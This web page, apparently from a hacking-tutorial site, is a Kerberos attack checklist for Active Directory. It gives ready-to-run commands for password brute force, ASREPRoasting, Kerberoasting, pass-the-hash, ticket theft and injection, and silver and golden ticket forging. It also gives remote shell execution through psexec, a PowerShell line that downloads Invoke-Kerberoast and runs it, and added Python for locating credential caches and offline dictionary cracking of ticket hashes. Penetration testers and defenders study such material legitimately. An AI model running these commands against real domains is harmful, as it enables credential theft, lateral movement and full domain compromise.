Hacking Book | Free Online Hacking Learning

kerberos attack checklist

Posted by agaran at 2020-02-27

0x01 Brute force

Password guessing against the KDC through AS-REQ pre-authentication. Failed attempts count towards the domain lockout policy, so check it before running a list.

Using kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

Using Rubeus:

.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

Without /users, the Rubeus brute module enumerates the domain users through LDAP first:

.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

0x02 ASREPRoast

Accounts with "Do not require Kerberos preauthentication" set return an AS-REP whose encrypted part is keyed with the user's password-derived key, so it can be requested without knowing the password and cracked offline.

Using the impacket example GetNPUsers.py:

python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Without domain credentials, supply a list of user names to test:

python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Using Rubeus:

.\Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>

Password dictionary cracking:

hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>

john --wordlist=<passwords_file> <AS_REP_responses_file>

0x03 Kerberoasting attack

Any domain user can request a service ticket for any SPN. The ticket is encrypted with the service account's key, so tickets for user accounts that have an SPN can be cracked offline.

Using the impacket example GetUserSPNs.py:

python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>

Using Rubeus:

.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>

Using PowerShell:

iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>

Password dictionary cracking (--force only suppresses hashcat's warnings; drop it unless you need it):

hashcat -m 13100 --force <TGSs_file> <passwords_file>

john --format=krb5tgs --wordlist=<passwords_file> <TGSs_file>

0x04 Pass The Hash & Pass The Key

With a user's NT hash (which is the RC4-HMAC Kerberos key) or AES key you can request a TGT directly and use it from Linux or Windows.

Using the impacket examples:

python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
python getTGT.py <domain_name>/<user_name>:[password]

export KRB5CCNAME=<TGT_ccache_file>
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Using Rubeus (asktgt also accepts /aes256:<aes_key>; an RC4-only TGT request stands out in a domain that defaults to AES):

.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
.\PsExec.exe -accepteula \\<remote_hostname> cmd

0x05 Pass The Ticket (PTT)

Get tickets from Linux

Check the type and location of the credential cache:

grep default_ccache_name /etc/krb5.conf

If nothing is returned, the default is a file cache:

FILE:/tmp/krb5cc_%{uid}

If the tickets are in files, copy the ccache file (you need read permission on it) and use it as it is.

If the tickets are in the kernel keyring (KEYRING:), they are not on disk; use tickey to extract them:

cp tickey /tmp/tickey
/tmp/tickey -i
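The check above done programmatically, as an added example that is not from the original page: the code reads default_ccache_name from a krb5.conf text, expands the %{uid} and %{username} parameters the way libkrb5 does, and classifies the result so you know whether copying the file is enough or tickey is needed. The two krb5.conf snippets, the uid and the user name are constructed; the fallback is MIT Kerberos's compiled-in default FILE:/tmp/krb5cc_%{uid}.

```python
# Added example (not from the original page): find a user's Kerberos credential
# cache the way libkrb5 does, and classify it so you know whether copying the
# file is enough or tickey is needed. The krb5.conf texts below are constructed.
import re

# MIT Kerberos's compiled-in default when krb5.conf sets nothing.
BUILTIN_DEFAULT = "FILE:/tmp/krb5cc_%{uid}"


def default_ccache_name(krb5_conf: str) -> str:
    """Return default_ccache_name from [libdefaults], or the built-in default."""
    section = None
    for raw in krb5_conf.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":          # krb5.conf comment lines
            continue
        header = re.fullmatch(r"\[(\w+)\]", line)
        if header:
            section = header.group(1)
        elif section == "libdefaults" and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            if key == "default_ccache_name":
                return value
    return BUILTIN_DEFAULT


def resolve_ccache(krb5_conf: str, uid: int, username: str) -> tuple:
    """Expand %{uid} / %{username} and split the cache type from its residual."""
    name = default_ccache_name(krb5_conf)
    name = name.replace("%{uid}", str(uid)).replace("%{username}", username)
    cctype, sep, residual = name.partition(":")
    if not sep:                                  # a bare path is a FILE: cache
        cctype, residual = "FILE", cctype
    return cctype, residual


def collection_hint(cctype: str) -> str:
    """What the operator can do with each cache type."""
    return {
        "FILE": "copy the file (needs read permission) and point KRB5CCNAME at the copy",
        "DIR": "copy the directory; every file inside it is one FILE: cache",
        "KEYRING": "tickets are in the kernel keyring, not on disk: dump them with tickey",
    }.get(cctype, "unknown cache type, inspect /etc/krb5.conf by hand")


# Constructed snippets: a Debian-style file with no default_ccache_name, and the
# RHEL/Fedora layout, which keeps tickets in the kernel keyring.
DEBIAN_CONF = """
[libdefaults]
    default_realm = CORP.LOCAL
    dns_lookup_kdc = true
"""
RHEL_CONF = """
# Generated by sssd
[libdefaults]
    default_realm = CORP.LOCAL
    default_ccache_name = KEYRING:persistent:%{uid}
[realms]
 CORP.LOCAL = {
  kdc = dc01.corp.local
 }
"""

if __name__ == "__main__":
    for label, conf in (("debian", DEBIAN_CONF), ("rhel", RHEL_CONF)):
        cctype, where = resolve_ccache(conf, 1000, "alice")
        print(f"{label}: {cctype}:{where} -> {collection_hint(cctype)}")
```

On the RHEL-style configuration the resolver returns KEYRING:persistent:1000, which is exactly the case where grepping /tmp finds nothing and tickey is the right tool; on the Debian-style one it falls back to FILE:/tmp/krb5cc_1000.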

Get tickets from Windows

Using mimikatz:

mimikatz # sekurlsa::tickets /export

Using Rubeus in PowerShell (dump prints each ticket as base64; write it back to a .kirbi file):

.\Rubeus.exe dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64_ticket>"))

Both need local administrator rights to reach the tickets of other logon sessions.

Convert between the Windows (.kirbi) and Linux (.ccache) ticket formats with ticket_converter.py:

python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi

Using ticket in Linux:

Use the impacket examples:

export KRB5CCNAME=<TGT_ccache_file_path>
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Using ticket in Windows:

Using mimikatz: inject the .kirbi file with the kerberos::ptt module.

Use Rubeus to inject ticket:

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Use psexec to execute CMD on the remote machine:

.\PsExec.exe -accepteula \\<remote_hostname> cmd

0x06 Silver ticket

A service ticket forged with the service account's key (NT hash or AES key). The KDC is never contacted, so the ticket only works against services that use that key, and only for the SPN it was forged for.

Use the impacket example:

python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

export KRB5CCNAME=<TGS_ccache_file>
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Using mimikatz: forge the ticket with kerberos::golden, passing the service key as /rc4, /aes128 or /aes256 together with /domain, /sid, /user, /service and /target, then inject it with kerberos::ptt.

Use Rubeus to inject ticket:

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Use psexec to execute CMD on the remote machine:

.\PsExec.exe -accepteula \\<remote_hostname> cmd

0x07 Golden ticket

A TGT forged with the krbtgt account's key. The KDC accepts it for any service, and it keeps working until the krbtgt password has been changed twice.

Use the impacket example:

python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>
python ticketer.py -aesKey <krbtgt_aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>

export KRB5CCNAME=<TGT_ccache_file>
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Using mimikatz: forge the TGT with kerberos::golden, passing the krbtgt key as /krbtgt (NT hash), /aes128 or /aes256 together with /domain, /sid and /user, then inject it with kerberos::ptt.

Use Rubeus to inject ticket:

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Use psexec to execute CMD on the remote machine:

.\PsExec.exe -accepteula \\<remote_hostname> cmd

0x08 Miscellaneous

Compute the NT hash of a known password (MD4 over the UTF-16LE encoding of the password). This value is the RC4-HMAC (etype 23) Kerberos key, which is why it can be passed directly as -hashes, -nthash or /rc4 above:

python3 -c 'import hashlib; print(hashlib.new("md4", "<password>".encode("utf-16le")).hexdigest())'

On systems built against OpenSSL 3, hashlib.new("md4") raises ValueError unless the legacy provider is enabled.

Tools referenced: kerbrute.py, Rubeus, PsExec, Impacket, tickey, Mimikatz.
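The cracking steps of 0x02 and 0x03 and the NT-hash one-liner above come together in this added Python example (it is not code from the original page, hashcat or impacket). It implements MD4 in pure Python so the NT hash can still be computed where OpenSSL has dropped md4, builds the etype 23 RC4-HMAC encryption from RFC 4757, writes a constructed $krb5tgs$23$ and $krb5asrep$23$ line in the layouts the tools above produce, and then runs the check that hashcat -m 13100 and -m 18200 perform: derive the key from each candidate password, decrypt, and compare the HMAC. The user, realm, SPN, passwords and ticket bytes are made up; a real ticket's plaintext is DER, which does not change the check.

```python
# Added example (not code from the original page, hashcat or impacket): what
# hashcat -m 13100 / -m 18200 verify for etype 23, and why the NT hash is the key.
# All hash lines are constructed here from made-up passwords; the "ticket" bytes
# are placeholders, not real DER.
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), so nt_hash() works even where OpenSSL 3 has no
    legacy provider and hashlib.new("md4") raises ValueError."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (boolean function, additive constant, message word order, shifts)
        (f, 0x00000000, range(16), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                # MD4 updates a, d, c, b in turn; rotating the tuple keeps one formula
                a = rotl((a + func(b, c, d) + x[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is also the etype 23 (RC4-HMAC) key."""
    return md4(password.encode("utf-16le"))

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):                       # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                          # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes) -> bytes:
    """RFC 4757: returns checksum(16 bytes) || RC4(Ke, confounder || plaintext)."""
    ki = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    data = os.urandom(8) + plaintext           # 8-byte random confounder
    checksum = hmac.new(ki, data, hashlib.md5).digest()
    ke = hmac.new(ki, checksum, hashlib.md5).digest()
    return checksum + rc4(ke, data)

def rc4_hmac_check(key: bytes, usage: int, checksum: bytes, edata: bytes) -> bool:
    """The cracker's inner loop: derive Ke from the candidate key, decrypt, and test
    whether the HMAC over confounder||plaintext equals the checksum sent in clear."""
    ki = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    ke = hmac.new(ki, checksum, hashlib.md5).digest()
    plain = rc4(ke, edata)
    return hmac.compare_digest(hmac.new(ki, plain, hashlib.md5).digest(), checksum)

def forge_tgs_line(user, realm, spn, service_password, ticket=b"<constructed EncTicketPart>"):
    """Constructed $krb5tgs$23$ line in the layout GetUserSPNs.py/Rubeus emit (key usage 2)."""
    blob = rc4_hmac_encrypt(nt_hash(service_password), 2, ticket)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${blob[:16].hex()}${blob[16:].hex()}"

def forge_asrep_line(user, realm, user_password, encpart=b"<constructed EncASRepPart>"):
    """Constructed $krb5asrep$23$ line in the layout GetNPUsers.py emits (key usage 8)."""
    blob = rc4_hmac_encrypt(nt_hash(user_password), 8, encpart)
    return f"$krb5asrep$23${user}@{realm}:{blob[:16].hex()}${blob[16:].hex()}"

def parse_hash_line(line: str):
    """Return (key usage, checksum, edata) for the two etype 23 layouts above."""
    parts = line.split("$")
    if parts[1] == "krb5tgs":      # $krb5tgs$23$*user$REALM$spn*$checksum$edata
        return 2, bytes.fromhex(parts[-2]), bytes.fromhex(parts[-1])
    if parts[1] == "krb5asrep":    # $krb5asrep$23$user@REALM:checksum$edata
        return 8, bytes.fromhex(parts[3].split(":", 1)[1]), bytes.fromhex(parts[-1])
    raise ValueError("unsupported hash line")

def crack(line: str, wordlist):
    """Dictionary attack: first candidate whose NT hash verifies the checksum, else None."""
    usage, checksum, edata = parse_hash_line(line)
    for candidate in wordlist:
        if rc4_hmac_check(nt_hash(candidate), usage, checksum, edata):
            return candidate
    return None
```

Call crack(forge_tgs_line("svc_sql", "CORP.LOCAL", "MSSQLSvc/db01.corp.local:1433", "Summer2020!"), wordlist) to see the round trip: every wrong candidate fails because the HMAC is keyed with Ki, which is derived from the NT hash, and only the service account's real password verifies. It also shows why etype 23 tickets are the preferred target: an AES (etype 17/18) ticket costs PBKDF2 with 4096 iterations per candidate, while RC4-HMAC costs one MD4 and a few HMAC-MD5 calls.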